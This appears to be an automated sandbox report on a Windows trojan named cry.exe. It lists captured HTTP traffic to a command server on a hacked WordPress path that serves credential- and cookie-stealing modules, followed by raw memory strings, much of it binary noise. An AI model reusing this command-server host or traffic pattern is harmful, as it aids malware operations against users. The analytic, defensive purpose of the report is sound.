AD><BODY>.<H1>302 Moved</H1>.The document has mov
ed.<A HREF="hXXps://VVV.google.com.ua/webhp?gfe_rd=cr&ei=vwaiV6
7PD4u5ygXzlKKoAQ&gws_rd=ssl">here</A>...</BODY><
/HTML>....



GET /webhp HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.google.com
Cache-Control: no-cache


HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.google.com.ua/webhp?gfe_rd=cr&ei=vQaiV5nVOpC5ygX67qCwCA
Content-Length: 267
Date: Wed, 03 Aug 2016 14:59:09 GMT
Connection: close
<HTML><HEAD><meta http-equiv="content-type" content="te
xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE
AD><BODY>.<H1>302 Moved</H1>.The document has mov
ed.<A HREF="hXXp://VVV.google.com.ua/webhp?gfe_rd=cr&ei=vQaiV5n
VOpC5ygX67qCwCA">here</A>...</BODY></HTML>....



GET /webhp HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.google.com
Cache-Control: no-cache


HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.google.com.ua/webhp?gfe_rd=cr&ei=vwaiV67PD4u5ygXzlKKoAQ
Content-Length: 267
Date: Wed, 03 Aug 2016 14:59:11 GMT
Connection: close
<HTML><HEAD><meta http-equiv="content-type" content="te
xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE
AD><BODY>.<H1>302 Moved</H1>.The document has mov
ed.<A HREF="hXXp://VVV.google.com.ua/webhp?gfe_rd=cr&ei=vwaiV67
PD4u5ygXzlKKoAQ">here</A>...</BODY></HTML>....



POST /wp-admin/css/php/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: brokelimiteds.in
Content-Length: 128
Connection: Keep-Alive
Cache-Control: no-cache

.....
ra77.V-..
pC.-......c1:I8@V.=Bv
KR)....B..<......"iD.......-.... ..........F.Db...F.W.
.0....L.....w.s..e..7...*........
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2016 14:58:08 GMT
Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4 mod_fcgid/2.3.9
X-Powered-By: PHP/5.6.23
Cache-Control: public
Content-Disposition: attachment; filename="./files/cit_video.module"
Content-Transfer-Encoding: binary
Content-Length: 177951
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
.....f[.J..Y....R.4];.|...n.....B.....).......r..1:.i....Zg..y..V(%<
;.:...F.~.~0HurQ.l.E.........9Jm...v...O4."@...1..W...0..W.0z1.(}..\.T
G...w.E..`X.H.....@TT7..."0jiX.f..DtE.....%.D...rOh.q.%Y.7.\.&...W.?.&
gt;.,...!".......D`._c....N...=(.1n7.x....c{C/..R..go............!~XM.
A....^4.DE![].vH...../W]m./.R... Z.T....$.G.VI-l.O....c>.L.`....#.`
R.t....~x u......m..........."$.1u..K...mE.x...r ...um.>"R..E6..;..
f..../V.om...l.}....~i?...........^Q.m...9........5..N5...i.KW.:..^...
9...e8'eA..........c..%......V......3&...%q.}K...v$.XZq=}c!.%.`TY;...:
....R.........$.%.Y...&:....]m...UxI`c:..d........x.:....V.n.SVG..P.u.
.Ia.s..,.E .....F....!.mU......3._.y.,u.. ...R.L....RH.~..B..P.f.7E*..
.,...6.b.HWD......$..F...i{../.].&N&.S.....z.1V.&....UK..TL....C..E..H
..b$.V..f......_,...7.?W r@.$.g".y).4....*.jkx....].&3.....3}5..K.T{0.
...W.!...s.......?.a.s<..B.T)$v...2i?..T...W..?......B.......H...v.
.eM.....|...Q".| ^....|Tck45'..>[email protected]...
..z.g7?.X.9.).5....`x..eNa~9t6B8J_...4..J....x...}}....|..S...{....Rg.
$..............:[email protected].:...hc..]..p......v......2..lR.O.xt..Z{..#w{.
S.........'.....3..hA....Y..e...4.V..8.1.z..N...$~..[z....d.d.a...g...
%T..O..N..._..E...L....\.F1..}.~...^...OO%.!..............zm'...A.....
$.......[.[L.!V.....:.....s....$"...V......{.9.Z(s..!...|I.....J,.7...
./[email protected].....|....v. ;....<(....%
e...(N}l.......g....K....6..F\X.KPJ.....l7$.....(@.... ....1..q..FrgL.
C.W.?r.[.$..(.\...o.U. ~@s...........`\..".._......g.......U.... .
<<< skipped >>>

POST /wp-admin/css/php/file.php HTTP/1.1


Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: brokelimiteds.in
Content-Length: 131
Connection: Keep-Alive
Cache-Control: no-cache

.....%g[..._b.M<V_rK.&......h:1B..v...OG.......r..,1.....Yt9.......>.......>....5?v$tR.(2v.g.=...$..|6%...D.C.'U2...7...l.....79G.
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2016 14:58:14 GMT
Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4 mod_fcgid/2.3.9
X-Powered-By: PHP/5.6.23
Cache-Control: public
Content-Disposition: attachment; filename="./files/cit_ffcookie.module"
Content-Transfer-Encoding: binary
Content-Length: 221471
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream
.....f[.J..Y.&...7....~..j......e.:[l...s.3D....-..3......p..........G
{[email protected]:..rd....A.f.e....w.........k.tB......x...d.9
....;.NZ.5.......\Q..<...r......W.wV..8b.1o&.....>.".....aU:....
..O......g,....Cr.....]&..x...C.y.>A....^]....)..L....).........].?
6.P^.(...~...![]...x..S.t5$.....>E.fb.|...~...$....,.=..4{.A....O.G
s...X9....K.i.....'.Q.....3.;....3.F.Gw...r..2.T..j...r.........!....$
k...Z*...'Z.....n..X\......x.....3......'......H..Pt.U...W.......^..'.
....S........ld.q2`.f.yM.....9.p.Y.....Wy.A^4.s....%[email protected]..
.Y..;.W...S.yd.s4`...&:...de(.x..y..a....i{.Q)p.q...$.u...i......P.56.
.-y. t.H.>.6..t7.i.....\.n......y.If}.....AF*....}..W...Z.....&...a
%A.."D.[....N.]2l.:Dr5......\T..M....Ai..........i..H.W...WJ.rm.=2..1.
.$.3$~Y-z..G.q..)..Re.\i5\R......r[:..!...SMM......L...m?%.e..,...3. a
U.Q....[....J1.....A-..-o........h%z.P.zB.......S~.u......zf..m.h.a...
.K..a...x...5;.<........AB.........^...F....L.s29\.....6m.p....?:Z.
.M..".....f.......X....96....C6...YT...*.Ai.3...".........7k.....hU. .
...[..2lS..m..V.>.1.......l....w...$...?...._....;.?...!.'..o...}3}
..%...a......O.D-.7...W....w...(.~S...6...h.. z-J.......1.._e}:.Y..L.@
.8..i..1..O..a.([email protected].$....F.....l.^.<4.,.;...
$....a1...[..Z.5;......I......]..K3.s...>...0.&;.:-.*..5.......urk.
......b.?..f&A.R|......".........VzD..MX<O].1........D..[}._K$A...i
 .i/...z..I..P..q......Ncp....:.M......A.d.bl5S?`....$....Q.X.-.......
.*..5..{.t...C1...P......nbp.w<..R\...n....V.i....4..3...F.....
<<< skipped >>>


GET /pca3-g5.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "49ddd5ee9b8941ed8ccf55aec088f07c:1467490816"
Last-Modified: Sat, 02 Jul 2016 20:20:16 GMT
Date: Wed, 03 Aug 2016 14:57:58 GMT
Content-Length: 571
Connection: keep-alive
Content-Type: application/pkix-crl
0..70...0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...
U....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For au
thorized use only1E0C..U...<VeriSign Class 3 Public Primary Certifi
cation Authority - G5..160630000000Z..160930235959Z0#0!..n.N/.v...J..%
R.t..160630163929Z0...*.H..............h...._.......VT..`.\.Y._.=lg...
..*.eLto........v.V-.6W.`fa..#.kwE..vH... .....d.A..)n.>...9l..@B..
...6....................<.N....PA..G.EH9.R._...._3....7.N..7...'.t.
t......N).....I.g......@.#.."..`.../%......;6..h....Q.L8.e..b/.8.t..W.
[email protected]$f....P..HTTP/1.1 200 OK..Server: Apache..ETag: "49ddd5ee9b
8941ed8ccf55aec088f07c:1467490816"..Last-Modified: Sat, 02 Jul 2016 20
:20:16 GMT..Date: Wed, 03 Aug 2016 14:57:58 GMT..Content-Length: 571..
Connection: keep-alive..Content-Type: application/pkix-crl..0..70...0.
..*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriS
ign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For authorized u
se only1E0C..U...<VeriSign Class 3 Public Primary Certification Aut
hority - G5..160630000000Z..160930235959Z0#0!..n.N/.v...J..%R.t..16063
0163929Z0...*.H..............h...._.......VT..`.\.Y._.=lg.....*.eLto..
......v.V-.6W.`fa..#.kwE..vH... .....d.A..)n.>[email protected]......
..............<.N....PA..G.EH9.R._...._3....7.N..7...'.t.t......N).
....I.g......@.#.."..`.../%......;6..h....Q.L8.e..b/[email protected].
C$f....P....
<<< skipped >>>


GET /sf.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: sf.symcb.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "32fab37b2b373a0a0b19f1374b5f121d:1470215192"
Last-Modified: Wed, 03 Aug 2016 09:06:32 GMT
Date: Wed, 03 Aug 2016 14:57:58 GMT
Transfer-Encoding:  chunked
Connection: keep-alive
Connection: Transfer-Encoding
Content-Type: application/pkix-crl
00006000..0..V.0..Ul...0...*.H........0..1.0...U....US1.0...U....VeriS
ign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at h
ttps://VVV.verisign.com/rpa (c)101.0,..U...%VeriSign Class 3 Code Sign
ing 2010 [email protected]
0730092631Z0!....c..k....D.k.....120708062201Z0!... _...u.t.=.<.&..
.130218061114Z0!...&..].....P.k.:...120125130117Z0!...7P.x....8.Q...s.
.130227010252Z0!...9t.*.].....~.....160114221207Z0!...J.....Q..Y.[....
.110404153956Z0!...d...=..q!_...g9..130729145216Z0!...d....Y.......o..
.140711083257Z0!...l.....h2<.H......120329152211Z0!...q.9...`H.*.Y.
C...120525202212Z0!...s...TM.......0...121221080842Z0!...t..,.. ...eL.
....130314222305Z0!...y..r.HW.v.....w..140423054643Z0!..../u.......A..
5...101214165045Z0!.....0.Xc...%...iM..121102230226Z0!.......S.a&.X5t.
E]..111206083350Z0!....c.(....B.[M83...140108164517Z0!....A.Sv.....f,.
....110609003155Z0!.....z......!.ID{]..101228182208Z0!....b^......{d.J
'...130102154110Z0!.......n........'u..140521222808Z0!......0.........
.I..130912181631Z0!.....1.;C,.. L..0...141111073655Z0!....6e...~..T...
....130131012247Z0!.....|.....t.l.o....140827175301Z0!.........bD#*u..
....130226223939Z0!.......@..'$.).;}\..130121172259Z0!....7.v.........
.n..120724160733Z0!....n[..P..a.y...p..141121045513Z0!....P;.Y..d...c.
(...120209181451Z0!.....].bb[.....!....140328205453Z0!.....a...L`..IV.
[email protected]!...........].{7.
....120730000000Z0!...".......Z.V.,.e..121031192224Z0!...'....[.1.
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

cry.exe_372_rwx_00D50000_00006000:

%x#yRh

cry.exe_372_rwx_03720000_0000F000:

{@0 {`0 {01 {@1 {

DW20.EXE_1296:

.text
`.data
.cdata
.rsrc
watson.microsoft.com
.mdmp
%s?szAppName=%S&szAppVer=%S&szAppStamp=%S&szModName=%S&szModVer=%S&szModStamp=%S&fDebug=%S&offset=%S
/dw/stagetwo.asp
%s/%S/%S/%S/%S/%S/%S/%S/%S.htm
Failed to fill report params from generic params
Not offering reporting
%s Mode
Failed to get a reporting destination
Nothing to report from queue
No reports left to send. Removing queue triggers and bailing.
Failed to plug UI; LCID=%u
Ignoring %S due to unknown queue version
Reporting is disabled
SignOff queue reporting is disabled
Queued Reporting Mode called but still want to report to the queue
Bad queue type to report from
No reports for given queue mask - %u
Invalid queue mask - %u
Suspending: Force cancel to queued reporting
Suspending: Force cancel to network reporting
CreateWindowExA failed with %d.
Application Error Reporting %d
WatsonQueuedReportingInstanceVerification
riched20.dll
qMicrosoft\PCHealth\ErrorReporting\DW
msaccess.exe
hXXp://watson.microsoft.com/dw/dcp.asp
hXXp://watson.microsoft.com/dw/watsoninfo.asp
dwintl20.dll
Launching lightweight browser with URL
mshtml.dll
Not reporting
Reporting
DWBypassQueue
DWExplainerURL
DWNoSignOffQueueReporting
DWAlwaysReport
DWReporteeName
DWURLLaunch
DWNoExternalURL
DWStressReport
ole32.dll
imm32.dll
BTLog.dll
Microsoft\PCHealth\ErrorReporting\DW
HKLM\Software\Microsoft\Windows NT\CurrentVersion\AeDebug\Debugger
hXXp://
hXXps://
Software\Microsoft\PCHealth\ErrorReporting\DW\Debug
%s\%s
https
DwBTLog.log
Failed to get minidump for %S!
szAppName=%s
szAppVer=%d.%d.%d.%d
szAppStamp=x
szModName=%s
szModVer=%d.%d.%d.%d
szModStamp=x
fDebug=%s
offset=x
microsoft.com
.msn.com
.microsoft.com
d:d:d d-d-d
/dw/generictwo.asp
kernel32.dll
psapi.dll
mso.dll
MsoDWRecover%x
MsoDWHang%x
Launching browser with URL
shell32.dll
%d.%d.%d.%d
%d.%d.%d.%d.x.%d.%d
shfolder.dll
unknown.sig
%s dw20.exe %d.%d.%d.%d
RegKey=
ResponseURL=
URLLaunch=
NoExternalURL=
%s:(%s) XX
%s:(%s) X
%s:(%s)
%s:(%s) %s
registry.txt
wql.txt
Windows NT Version %d.%d Build: %d
Stage 1 server response: %s
Stage 2 server response: %s
Stage 4 server response: %s
StatusCode: %d
Opening server: %s
HttpOpen failed.
Opening %s Request:
HTTPS
HttpSend Failed.
HttpWrite Failed, GLE=%d.
HttpEndReq failed.
Count filename length greater than MAX_PATH, can't report.
Filesystem reporting: count file updated
FReportToQueue: GetLastError=%u
FReportToQueue: File Tree Root does not exist: %S
Failed to add heap file to cab: %S
memory.dmp
mdmpmem.hdmp
version.txt
Network reporting complete.
Network reporting failed.
Application Error Reporting Transfer %d
Filesystem reporting complete
Filesystem reporting: cab successfully written
Filesystem reporting: could not find/create directory for cab/count
Filesystem reporting: redirection failure, too many redirects
Filesystem reporting: redirection failure, no previous roots
Filesystem reporting: improper file tree root
Filesystem reporting cancelled
Filesystem reporting: file tree root is too long
Record: 0xxx
Address: 0xxx
Code: 0xx
Flags: 0xx
x:x
(%d.%d:%d.%d)
Checksum: 0xx
Time Stamp: 0xx
Image Base: 0xx
Image Size: 0xx
Module %d
Windows NT %d.%d Build: %d
CPU AMD Feature Code: X
CPU Version: X CPU Feature Code: X
CPU Vendor Code: X - X - X
0xx:
0xx: x x x x
EFlags: 0xx ESP: 0xx SegSs: 0xx
EIP: 0xx EBP: 0xx SegCs: 0xx
EBX: 0xx ECX: 0xx EDX: 0xx
EDI: 0xx ESI: 0xx EAX: 0xx
Thread ID: 0xx
Thread %d
Memory Range %d
Software\Microsoft\PCHealth\ErrorReporting\DW
OkToReportFromTheseQueues
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Failed to obtain queue mutex. GetLastError=%u
FGetQueueMutex: WaitForSingleObject returned %u
Failed to open or create queue mutex. GetLastError=%u
Failed queued reporting pester check
Failed to create run reg key
Persistent run key is set.
CoInitializeEx() returned 0x%x.
Reporting to Admin Queue
Reporting to Regular Queue
Reporting to SignOff Queue
Reporting to Headless Queue
Reporting from Regular Queue
Reporting from SignOff Queue
Reporting from Headless Queue
OOM Failed to alloc QueuedReportData
FAllocSD: GetLastError=%u
%s%s%s
FEnsureQueueDirW: GetLastError=%u
Failed to write snt. GLE: %u
Failed to create snt. GLE: %u
Failed to set info; bad queue type: %u
Failed to open reg key for queue
Failed to get windows folder path for queue: %u
Failed to move instr file from queue A to queue B - %u
Failed to move cab file from queue A to queue B - %u
Did not move any reports from admin q to user q
Did not move any reports from user q to headless q
Queue types that have reports: %u
Setting triggerAtConnectionMade to: %u
Setting triggerAtLogon to: %u
Setting the queue trigger based upon: %u
SUCCESS adding report to queue
Launched (%S)
Failed to store the SensSubscription. hr: %d
failed to allocate PROGID string: %S
Failed putting SubscriberInterface. hr: %d
Failed putting PerUser. hr: %d
Failed putting Enabled. hr: %d
Failed putting MachineName. hr: %d
Failed putting OwnerSID. hr: %d
Failed putting Description. hr: %d
Failed putting InterfaceID. hr: %d
Failed putting EventClassID. hr: %d
Failed putting MethodName. hr: %d
Failed putting SubscriptionName. hr: %d
Failed putting PublisherID. hr: %d
Failed putting SubscriberCLSID. hr: %d
Failed putting SubscriptionID. hr: %d
Failed CoCreateInstance on EventSubscription. hr: %d
Failed to remove the SensSubscription. hr: %d
failed to allocate query string: %S
Failed CoCreateInstance on EventSystem. hr: %d
SENS: StringFromIID() returned <%x>
DWSHARED: SysAllocString(%s) failed!
Failed to subscribe subscription %u. hr: %d
Failed to get data for subscription %u. hr: %d
Failed to query install reg key
Failed to open install reg key
Software\Microsoft\PCHealth\ErrorReporting\DW\Installed
HKEY_USERS\
HKEY_CURRENT_CONFIG\
HKEY_CLASSES_ROOT\
HKEY_LOCAL_MACHINE\
HKEY_CURRENT_USER\
initing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
freeing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
0addref CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
QIing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
releasing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
deleting CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
creating CDwAccessible: hwnd %x, idc %d
WriteAtOffset.Write(0x%x) failed, 0xx
WriteAtOffset.Seek(0x%x) failed, 0xx
WriteMemoryFromProcess.Read(0x%I64x, 0x%x) failed, 0xx
WriteStringToPool.Write(0x%x) failed, 0xx
WriteFunctionTable.RawEntries.Write(0x%x) failed, 0xx
WriteFunctionTable.RawTable.Write(0x%x) failed, 0xx
WriteFunctionTableList.DumpTable.Write(0x%x) failed, 0xx
WriteFunctionTableList.Seek(0x%x) failed, 0xx
WriteDirectoryEntry.Write(0x%x) failed, 0xx
Thread(0x%x) callback returned FALSE
WriteSystemInfo.GetOsCsdString failed, 0xx
WriteSystemInfo.GetCpuInfo failed, 0xx
CalculateSizeForSystemInfo.GetOsCsdString failed, 0xx
WriteHeader.GetCurrentTimeDate failed, 0xx
WriteDirectoryTable.Seek(0x%x) failed, 0xx
WriteMemoryInfo.Write(0x%x) failed, 0xx
WriteMemoryInfo.QueryVirtual(0x%I64x) failed, 0xx
WriteFullMemory virtual memory layout changed, retries %d, 0x%I64x (0x%I64x:0x%I64x) vs. 0x%I64x (0x%I64x:0x%I64x)
WriteFullMemory.Memory.Write(0x%x) failed, 0xx
WriteFullMemory.Memory.Read(0x%I64x, 0x%x) failed, retries %d, 0xx
WriteFullMemory.QueryVirtual(0x%I64x) for data failed, 0xx
WriteFullMemory.Desc.Write(0x%x) failed, 0xx
WriteFullMemory.QueryVirtual(0x%I64x) for info failed, 0xx
Kernel minidump write failed, 0xx
MarshalExceptionPointers.CxRecord.Read(0x%I64x, 0x%x) failed, 0xx
MarshalExceptionPointers.ExRecord.Read(0x%I64x, 0x%x) failed, 0xx
Invalid exception record parameter count (0x%x)
Invalid exception record size (0x%x)
Invalid CPU type (0x%x)
Invalid function table size (0x%x)
GetSystemType.GetOsInfo failed, 0xx
GetSystemType.GetCpuType failed, 0xx
Write.Start failed, 0xx
Dump type requires streaming but output provider does not support streaming
Invalid dump type 0x%x
dbghelp.dll
Alloc(0x%x) failed
Thread(0x%x) will not be included
GenGetImageSections.Section.Read(0x%I64x, 0x%x) failed, 0xx
GenGetImageSections.GenImageNtHeader(0x%I64x) failed
GenGetImageSections.Read(0x%I64x, 0x%x) failed, 0xx
0GenAllocateThreadObject.GetTebInfo(0x%x) failed, 0xx
GenAllocateThreadObject.GetContext(0x%x) failed, 0xx
GenAllocateThreadObject.Open(0x%x) failed, 0xx
GenReadTlsDirectory.Index(0x%I64x, %ws) failed, 0xx
GenReadTlsDirectory(0x%I64x, %ws) unknown machine 0x%x
GenReadTlsDirectory.Read(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GenDebugRecord(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GenImageNtHeader(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GetImageHeaderInfo(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GetVersion(0x%I64x, %ws) failed, 0xx
GenAllocateProcessObject.GetPeb(0x%x) failed, 0xx
GenIncludeUnwindInfoMemory.Enum(0x%I64x, 0x%x) failed, 0xx
GenGenTebMemory.TLS(0x%I64x) failed, 0xx
GenScanAddressSpace.QueryVirtual(0x%I64x) failed, 0xx
0GenGetAuxMemory(%ws) failed, 0xx
GenGetProcessInfo.EnumUnloadedModules(0x%x) failed, 0xx
GenGetProcessInfo.EnumUnloadedModules(0x%x) looped
GenGetProcessInfo.EnumFunctionTableEntries(0x%I64x, 0x%x) failed, 0xx
GenGetProcessInfo.EnumFunctionTables(0x%x) failed, 0xx
GenGetProcessInfo.EnumFunctionTables(0x%x) looped
GenGetProcessInfo.EnumModules(0x%x) failed, 0xx
GenGetProcessInfo.EnumModules(0x%x) looped
GenGetProcessInfo.EnumThreads(0x%x) failed, 0xx
GenGetProcessInfo.EnumThreads(0x%x) looped
GenGetProcessInfo.Start(0x%x) failed, 0xx
GenWriteHandleData.Desc.Write(0x%x) failed, 0xx
GenWriteHandleData.Header.Write(0x%x) failed, 0xx
GenWriteHandleData.ObjectName.Write(0x%x) failed, 0xx
GenWriteHandleData.ObjectNameLen.Write(0x%x) failed, 0xx
GenWriteHandleData.TypeName.Write(0x%x) failed, 0xx
GenWriteHandleData.TypeNameLen.Write(0x%x) failed, 0xx
GenWriteHandleData.Start(0x%x) failed, 0xx
GenWriteHandleData.Seek(0x%x) failed, 0xx
Software\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls
Software\Microsoft\Windows NT\CurrentVersion\KnownManagedDebuggingDlls
version.dll
ntdll.dll
%$%,%4%<%
S%T%U%V%W%X%Y%Z%[%\%]%^%_%`%a%
b%c%d%e%f%g%h%i%j%k%l%
!"#$%&'()* ,-./0123456789:;<=
!!!!2222
%%%f||||
!!!!2222||||
!"#$%&'(
'()* ,-./0
&'()* ,-./
&'()* ,-./012345
3456789
.ASex
!"#$%&'()* ,-./012
!"#$%&'()
?msodatad.dat
msodatalast.dat
Unicows.dll
Kernel32.dll
SHLWAPI.DLL
GDI32.DLL
wintrust.dll
1108160
0u.hN
0SSh 
t.WWWj
PSSh07
t5SSh(
PSSSSSSh
0SSSSh
ADVAPI32.dll
COMCTL32.dll
GDI32.dll
KERNEL32.dll
OLEACC.dll
OLEAUT32.dll
MSVCRT.dll
RPCRT4.dll
SHELL32.dll
SHLWAPI.dll
urlmon.dll
USER32.dll
VERSION.dll
WININET.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ReportEventA
ReportEventW
RegEnumKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyW
GetProcessHeap
GetSystemWindowsDirectoryW
_amsg_exit
_acmdln
ShellExecuteExA
UrlGetPartA
CreateURLMoniker
CreateDialogIndirectParamA
EnumWindows
HttpQueryInfoA
HttpSendRequestExA
HttpOpenRequestA
InternetCanonicalizeUrlA
InternetCrackUrlA
HttpEndRequestA
dw20.pdb
\devsplab1\otools\BBT_TEMP\DW20O.pdb
winword.exe
wwordlt.exe
excel.exe
excellt.exe
mspub.exe
frontpg.exe
outlook.exe
powerpnt.exe
powpntlt.exe
onenote.exe
infopath.exe
winproj.exe
ois.exe
visio.exe
`!`'`)` `
e%f-f|3 f'f/f
]!^"^#^ ^$^
t.uGuHu
x4x7x%x-x x
h&h(h.hMh:h%h h,k/k-k1k4kmk
k%lzmcmdmvm
^Q]Q~NzP}P\PGPCPLPZPIPePvPNPUPuPtPwPOP
]8^6^3^7^
ichczc]eVeQeYeWe_UOeXeUeTe
{1{ {-{/{2{8{
r6s%s4s)s:t*t3t"t%t5t6t4t/t
t&t(t%u&ukuju
WHX%X
`IaJa aEa6a2a.aFa/aOa)a@a bh
d@d%d'd
duewexei
kCpDpJpHpIpEpFp
S$S%S&S'S(S)S S,S.S2S3S5S6S8S:S;SBSFSKSNSOSPSUSVSXSYS[S]S_SbSdSeSgShSiSjSkSmStSvSzS}S~S
U U!U"U#U$U%U(U)U U:U=U?UBUGUIULUSUTUXUYUZU[U]U`UgUhUiUkUlUmUnUoUpUqUrUsUtUxUyUzU
c c!c"c#c$c%c&c'c.c0c1c5c7c?cRcSc[c\c]c^c_c`cacbcccdcfcjclcsctcyc~c
m!m#m$m&mCmDmEmFmGmHmImJmKmLmMmNmOmPmQmRmSmTmUmVmWm[m\m]mkmqmrmsm
nRsSsh
evg%f
m.tRa
gtr%x
Q%SKg
f.ebp>QI
y.yxT
fn:q%uN
aw.Toiz
RMeXe
S#S$S%S;ScSdSrSsStSuS
`!`"`&`'`)`*` `,`-`.`/`0`2`3`4`5`6`:`=`>`?`
^ ^!^"^#^$^%^&^'^.^}^
c c!c"c#c$c%c&c'c*c7c:c;cSc[c1e?e@eAeBeCeDeEe
f f!f"f#f$f%f&f'f(f)f*f f,f-f
m m!m"m#m$m%m&m'm(m)m*m m,m-m.m1m2m3m4m5m6m7m8m9m:m;m<m=m>m?m@mBmCmDmGmHmImJmKmLmMmNmOmPmQmRmSmTmUm
u u-u.uFuGuHuIuJuKuLuMuNuOuPuQuRuSu
U U!U"U#U$U%U&U'U(U4UJU
](^)^*^ ^,^-^/^0^1^
m/mAmFmVmWmXmYmZm[m\m]m^m_m`mambmcmdmemfmgmhmimjmkmlmmmnmompmqmrmsmtmumvmwmxmymzm{m|m}m~m
x x!x"x#x$x%x'x(x)x*x x,x.x/x0x1x2x3x4x5x6x7x8x9x:x;x<x=x>x?x@xAxXy_yaycydyeygyiyjykylynyoy
} }!}"}#}$}%}&}'}
] ]!]"]#]$]%]&]'](])]*] ],]-].]/]0]
]2^3^4^5^6^7^8^9^:^;^<^>^
cMeNeOePeQeReSeTeUeWeXeYeZe[e]ebe
X X!X"X#X$X%X&X'X(X)X*X X,X-X.X/X0X1X3X4X6X7X8X9X:X;X<X>X?X@XAXBXCXDXEXFXGXHXJXTX_X`XfXmX
d%d-d0d=dRdad2e\e^e_e`eaecedeeefegeheiejele
s"s#s$s%s&s(s)s,s-s/s0s1s2s3s4s5s6s8s9s>s@sGs
u$u%u&u/ujukulumunuouqurusutu
duewexeyeze{e
~ ~!~"~#~$~%~&~'~(~*~ ~-~8~:~0
| |!|"|#|$|%|&|(|)|*|-|.|/|0|1|2|6|
{3~3}3|3
eZl%u
Q.YeY
R:\Sg|p5rL
e$e#e e4e5e7e6e8eKuHeVeUeMeXe^e]erexei
s4s/s)s%s>sNsOs
s&t*t)t.tbt
2%2.bx
{ | }9},
d6exe9j
]%sOu4](n
m.t.zB}
w%xIyWy
^vcÓv
%f?iCt
U>_.lE
f.ebp
.nrR=
{fn:q%uN
crys.exe
name="Microsoft.Windows.ErrorReporter"
version="5.1.0.0"
publicKeyToken="6595b64144ccf1df" />
<description>Windows Error Reporting</description>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
1%s\%s\%s\%s\%s\%s\%s\%s
AppName: %s AppVer: %s AppStamp:%s
ModName: %s ModVer: %s ModStamp:%s
fDebug: %s Offset: %s
Main_AlwaysReportBtn=
Main_NoReportBtn=
Main_ReportBtn=
General_Reportee=
CheckBoxRegKey=
ReportingFlags=
Stage1URL=
Stage2URL=
%General_Reportee%
%u %s
%u.%u %s
%s %s %s %s in %s %s %s fDebug %s at offset %s
Bucket: d
BucketTable %d
%s, %s, %s, %s, %s, %s, %s, %s, %s, %s %s
\dw.log
policy.txt
crash.log
status.txt
hits.log
count.txt
%s\%s\%s
%s\%s\%s\%s
eDWQueuedReporting
DWPersistentQueuedReporting
"%s\%s" -%c
dwtrig20.exe
ReportSize=
\*.cab
dwq.snt
"%s" -%c %u
SEventSystem.EventSubscription
SubscriptionID=%s
#$%&%&'(
Comctl32.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\14B8B0.dmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
.NET Runtime 2.0 Error Reporting
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\dw.log
Microsoft Application Error Reporting
11.0.8160
Windows
DW20.Exe

cry.exe_372_rwx_03EE0000_0003B000:

.text
`.data
.reloc
%s, u %s %u u:u:u GMT
HTTP/1.1
HTTP/1.0
hXXp://
; charset=%s
HTTP/1.1 %u %s
Date: %s
Content-Length: %u
Expires: %s
Content-Type: %s%s
ID: %s
value_%s
value_%s_%s
